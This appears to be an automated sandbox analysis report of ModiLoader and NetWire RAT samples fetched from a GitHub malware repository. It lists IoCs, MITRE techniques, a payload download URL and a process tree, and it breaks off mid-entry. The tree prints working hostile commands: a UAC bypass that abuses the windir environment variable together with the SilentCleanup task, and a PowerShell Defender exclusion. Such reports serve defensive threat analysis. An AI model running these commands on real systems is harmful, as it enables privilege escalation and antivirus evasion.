modiloader | hxxps://github[.]com/Da2dalus/The-MALWARE-Repo

Resubmissions

09-08-2024 15:19

240809-sqpc9asckn 8

09-08-2024 15:17

240809-spfpqascjn 10

Analysis

max time kernel
94s
max time network
95s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
09-08-2024 15:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Da2dalus/The-MALWARE-Repo

Score

10^/10

modiloader netwire botnet defense_evasion discovery execution persistence privilege_escalation stealer trojan

Malware Config

Extracted

Family

modiloader

https://drive.google.com/u/0/uc?id=1TcSctGVBajYMA7CFDc158wpvqkpxmkhJ&export=download

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
botnet stealer netwire

ModiLoader First Stage 2 IoCs

resource	yara_rule
behavioral1/files/0x00090000000234c4-208.dat	modiloader_stage1
behavioral1/memory/2868-268-0x0000000010410000-0x000000001047E000-memory.dmp	modiloader_stage1

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2520	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 19 IoCs

pid	Process
2868	NetWire.exe
644	NetWire.exe
6356	NetWire.exe
6376	NetWire.exe
4936	NetWire.exe
5624	NetWire.exe
6084	NetWire.exe
5316	NetWire.exe
7820	NetWire (2).exe
5380	NetWire (2).exe
4720	NetWire (2).exe
4984	NetWire (2).exe
9076	NetWire (2).exe
4896	fodhelper.exe
8536	NetWire (1).exe
3612	NetWire.exe
7232	NetWire.exe
8964	NetWire.exe
5664	NetWire.exe

Loads dropped DLL 7 IoCs

pid	Process
6092	NetWire.exe
7060	NetWire.exe
6012	NetWire (2).exe
5712	NetWire (2).exe
7692	NetWire (2).exe
4896	fodhelper.exe
8356	NetWire (1).exe

Abuse Elevation Control Mechanism: Bypass User Account Control 1 TTPs 1 IoCs

UAC Bypass Attempt via SilentCleanup Task.

defense_evasion privilege_escalation

Bypass User Account Control

T1548.002

pid	Process
7404	schtasks.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Qspt = "C:\\Users\\Admin\\AppData\\Local\\Qspt\\Qspt.hta"	NetWire.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 14 IoCs

Web Service

T1102

flow	ioc
55	raw.githubusercontent.com
72	drive.google.com
114	drive.google.com
77	drive.google.com
90	drive.google.com
107	drive.google.com
70	drive.google.com
73	drive.google.com
91	drive.google.com
94	drive.google.com
54	raw.githubusercontent.com
64	drive.google.com
65	drive.google.com
108	drive.google.com

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 644 set thread context of 9196	644	NetWire.exe	124
PID 6376 set thread context of 5536	6376	NetWire.exe	130
PID 6092 set thread context of 6516	6092	NetWire.exe	131
PID 5624 set thread context of 4468	5624	NetWire.exe	132
PID 7060 set thread context of 9016	7060	NetWire.exe	133
PID 7232 set thread context of 8688	7232	NetWire.exe	170

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 31 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire (2).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire (1).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire (2).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire (2).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Notepad.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire (2).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire (2).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire (1).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire (2).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire (2).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire (2).exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings	cmd.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
8156	reg.exe
8276	reg.exe
6836	reg.exe

NTFS ADS 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 671110.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 915963.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 345047.crdownload:SmartScreen	msedge.exe

Script User-Agent 20 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	71	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	73	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	93	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	67	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	77	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	90	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	94	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	95	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	72	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	76	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	114	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	112	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	65	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	70	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	75	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	78	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	91	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	92	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	108	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	115	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
2380	msedge.exe
2380	msedge.exe
3788	msedge.exe
3788	msedge.exe
2716	identity_helper.exe
2716	identity_helper.exe
4468	msedge.exe
4468	msedge.exe
1340	msedge.exe
1340	msedge.exe
7632	msedge.exe
7632	msedge.exe
2520	powershell.exe
2520	powershell.exe
2520	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2520	powershell.exe

Suspicious use of FindShellTrayWindow 55 IoCs

pid	Process
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe
3788	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3788 wrote to memory of 3120	3788	msedge.exe	84
PID 3788 wrote to memory of 3120	3788	msedge.exe	84
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 1064	3788	msedge.exe	85
PID 3788 wrote to memory of 2380	3788	msedge.exe	86
PID 3788 wrote to memory of 2380	3788	msedge.exe	86
PID 3788 wrote to memory of 4180	3788	msedge.exe	87
PID 3788 wrote to memory of 4180	3788	msedge.exe	87
PID 3788 wrote to memory of 4180	3788	msedge.exe	87
PID 3788 wrote to memory of 4180	3788	msedge.exe	87
PID 3788 wrote to memory of 4180	3788	msedge.exe	87
PID 3788 wrote to memory of 4180	3788	msedge.exe	87
PID 3788 wrote to memory of 4180	3788	msedge.exe	87
PID 3788 wrote to memory of 4180	3788	msedge.exe	87
PID 3788 wrote to memory of 4180	3788	msedge.exe	87
PID 3788 wrote to memory of 4180	3788	msedge.exe	87
PID 3788 wrote to memory of 4180	3788	msedge.exe	87
PID 3788 wrote to memory of 4180	3788	msedge.exe	87
PID 3788 wrote to memory of 4180	3788	msedge.exe	87
PID 3788 wrote to memory of 4180	3788	msedge.exe	87
PID 3788 wrote to memory of 4180	3788	msedge.exe	87
PID 3788 wrote to memory of 4180	3788	msedge.exe	87
PID 3788 wrote to memory of 4180	3788	msedge.exe	87
PID 3788 wrote to memory of 4180	3788	msedge.exe	87
PID 3788 wrote to memory of 4180	3788	msedge.exe	87
PID 3788 wrote to memory of 4180	3788	msedge.exe	87

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc434946f8,0x7ffc43494708,0x7ffc43494718
  2⤵
  PID:3120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2008,17191681609142637198,12468565643852877198,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2020 /prefetch:2
  2⤵
  PID:1064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2008,17191681609142637198,12468565643852877198,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2008,17191681609142637198,12468565643852877198,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2952 /prefetch:8
  2⤵
  PID:4180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,17191681609142637198,12468565643852877198,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
  2⤵
  PID:5084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,17191681609142637198,12468565643852877198,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
  2⤵
  PID:2012
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2008,17191681609142637198,12468565643852877198,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5304 /prefetch:8
  2⤵
  PID:2648
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2008,17191681609142637198,12468565643852877198,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5304 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2008,17191681609142637198,12468565643852877198,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5480 /prefetch:8
  2⤵
  PID:640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,17191681609142637198,12468565643852877198,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4012 /prefetch:1
  2⤵
  PID:4552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2008,17191681609142637198,12468565643852877198,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6108 /prefetch:8
  2⤵
  PID:2624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2008,17191681609142637198,12468565643852877198,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5428 /prefetch:8
  2⤵
  PID:4400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2008,17191681609142637198,12468565643852877198,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2008,17191681609142637198,12468565643852877198,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1340
- C:\Users\Admin\Downloads\NetWire.exe
  "C:\Users\Admin\Downloads\NetWire.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2868
- - C:\Users\Admin\Downloads\NetWire.exe
    "C:\Users\Admin\Downloads\NetWire.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:644
  - - C:\Windows\SysWOW64\Notepad.exe
      C:\Windows\System32\Notepad.exe
      4⤵
      System Location Discovery: System Language Discovery
      PID:6712
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Natso.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:9076
      - C:\Windows\SysWOW64\reg.exe
        
        reg delete hkcu\Environment /v windir /f
        6⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:8156
      - C:\Windows\SysWOW64\reg.exe
        
        reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
        6⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:8276
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
        6⤵
        Abuse Elevation Control Mechanism: Bypass User Account Control
        System Location Discovery: System Language Discovery
        
        PID:7404
      - C:\Windows\SysWOW64\reg.exe
        
        reg delete hkcu\Environment /v windir /f
        6⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:6836
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Runex.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:8224
      - C:\Windows \System32\fodhelper.exe
        
        "C:\Windows \System32\fodhelper.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Public\x.bat
        7⤵
        
        PID:6424
        
        C:\Windows\system32\cmd.exe
        
        cmd /c C:\Users\Public\x.vbs
        8⤵
        Checks computer location settings
        Modifies registry class
        
        PID:5844
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\x.vbs"
        9⤵
        Checks computer location settings
        
        PID:7744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\cde.bat" "
        10⤵
        
        PID:1600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2520
  - - C:\Program Files (x86)\internet explorer\ieinstal.exe
      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      4⤵
      PID:9196
- C:\Users\Admin\Downloads\NetWire.exe
  "C:\Users\Admin\Downloads\NetWire.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6356
- - C:\Users\Admin\Downloads\NetWire.exe
    "C:\Users\Admin\Downloads\NetWire.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:6376
  - - C:\Program Files (x86)\internet explorer\ieinstal.exe
      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      4⤵
      PID:5536
- C:\Users\Admin\Downloads\NetWire.exe
  "C:\Users\Admin\Downloads\NetWire.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4936
- - C:\Users\Admin\Downloads\NetWire.exe
    "C:\Users\Admin\Downloads\NetWire.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:5624
  - - C:\Program Files (x86)\internet explorer\ieinstal.exe
      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      4⤵
      PID:4468
- C:\Users\Admin\Downloads\NetWire.exe
  "C:\Users\Admin\Downloads\NetWire.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6084
- - C:\Users\Admin\Downloads\NetWire.exe
    "C:\Users\Admin\Downloads\NetWire.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:6092
  - - C:\Program Files (x86)\internet explorer\ieinstal.exe
      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      4⤵
      PID:6516
- C:\Users\Admin\Downloads\NetWire.exe
  "C:\Users\Admin\Downloads\NetWire.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5316
- - C:\Users\Admin\Downloads\NetWire.exe
    "C:\Users\Admin\Downloads\NetWire.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:7060
  - - C:\Program Files (x86)\internet explorer\ieinstal.exe
      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      4⤵
      PID:9016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,17191681609142637198,12468565643852877198,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1
  2⤵
  PID:8728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
